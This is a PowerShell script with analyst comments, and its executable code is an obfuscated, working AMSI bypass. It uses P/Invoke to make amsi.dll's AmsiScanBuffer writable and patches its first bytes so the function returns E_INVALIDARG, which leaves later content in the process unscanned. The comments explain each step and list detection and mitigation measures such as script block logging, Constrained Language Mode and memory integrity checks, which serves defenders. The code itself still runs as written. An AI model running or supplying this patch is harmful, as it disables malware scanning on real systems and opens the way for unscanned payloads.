# Analysis summary: this script overwrites the first bytes of amsi.dll!AmsiScanBuffer
# in the current PowerShell process, so the function returns an error code at once
# instead of scanning. It is an in-memory AMSI tamper and affects only this process.
#
# Detection and mitigation:
#   - Script block logging (event ID 4104, Microsoft-Windows-PowerShell/Operational)
#     records this text. The -f format-operator string reassembly and the
#     backtick-split variable names (${OL`D`Pr`OTEct}, ${nu`LL}) are obfuscation signals.
#   - Add-Type with DllImport declarations for LoadLibrary, GetProcAddress and
#     VirtualProtect is uncommon in administrative scripts; alert on that combination.
#   - Constrained Language Mode (enforced through WDAC or AppLocker policy) does not
#     permit Add-Type, which stops the helper class below from being compiled.
#   - Memory integrity checks comparing the loaded amsi.dll code with the on-disk
#     image will show the modified function entry.
#
# Step 1: compile class W, which exposes three kernel32 P/Invoke entry points
# (GetProcAddress, LoadLibrary, VirtualProtect) to PowerShell as static methods.
${w} = @"
using System;using System.Runtime.InteropServices;public class W {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);}
"@;Add-Type ${w};
# Step 2 (all on one line below; PowerShell variable names are case-insensitive, so
# ${l}/${L}, ${A}/${a} and ${p}/${P} each refer to a single variable):
#   - "am" + "si" + ".dll" resolves to "amsi.dll"; LoadLibrary returns its module handle.
#   - 'A','msi' + 'Sca','n' + 'Buffe','r' resolves to "AmsiScanBuffer"; GetProcAddress
#     returns that export's address in ${A}.
#   - ${q} is assigned 0 and never read in the visible script.
#   - VirtualProtect is called on ${A} with size 5 and protection 0x40
#     (PAGE_EXECUTE_READWRITE); the previous protection goes to ${OLDPROTECT}.
#   - ${p} holds B8 57 00 07 80 C3, which on x86/x64 decodes as
#     `mov eax, 0x80070057; ret`. 0x80070057 is the HRESULT E_INVALIDARG.
#   - The long format string resolves to "System.Runtime.InteropServices.Marshal";
#     reflection then looks up its Public,Static Copy(Byte[], Int32, IntPtr, Int32)
#     overload and invokes it to copy the 6 bytes of ${p} to ${A}.
#   - The final parenthesised expression is the script's output: True when the module
#     handle and export address are non-zero and VirtualProtect returned true. It is
#     evaluated after the copy, so it reports status and does not gate the write.
# Effect: callers that treat a failed AmsiScanBuffer call as "not detected" will run
# later content in this process unscanned. NOTE(review): how the host reacts to the
# error code is not visible here.
${l} = [W]::LoadLibrary("am" + ("{0}{1}"-f'si','.dll'));${A} = [W]::GetProcAddress(${L}, ("{0}{1}" -f'A','msi') + ("{0}{1}" -f 'Sca','n') + ("{0}{1}" -f'Buffe','r'));${q} = 0;${OL`D`Pr`OTEct} = 0;${R`e`SuLt} = [W]::VirtualProtect(${A}, [uint32]5, 0x40, [ref]${ol`D`PROTeCT});${p} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3);${c} = [System.Type]::GetType(("{3}{0}{5}{7}{2}{8}{1}{6}{4}"-f'yst','n','e','S','eropServices.Marshal','e','t','m.Runtim','.I')).GetMethod(("{1}{0}"-f 'py','Co'), [reflection.bindingflags]("{1}{2}{0}"-f'c','Pu','blic,Stati'), ${nu`LL}, @([Byte[]], [Int32], [IntPtr], [Int32]), ${n`UlL});${c}.Invoke(${Nu`Ll}, @(${P}, 0, ${A}, 6));(${L} -ne [IntPtr]::Zero -and ${a} -ne [IntPtr]::Zero -and ${rEsU`lt})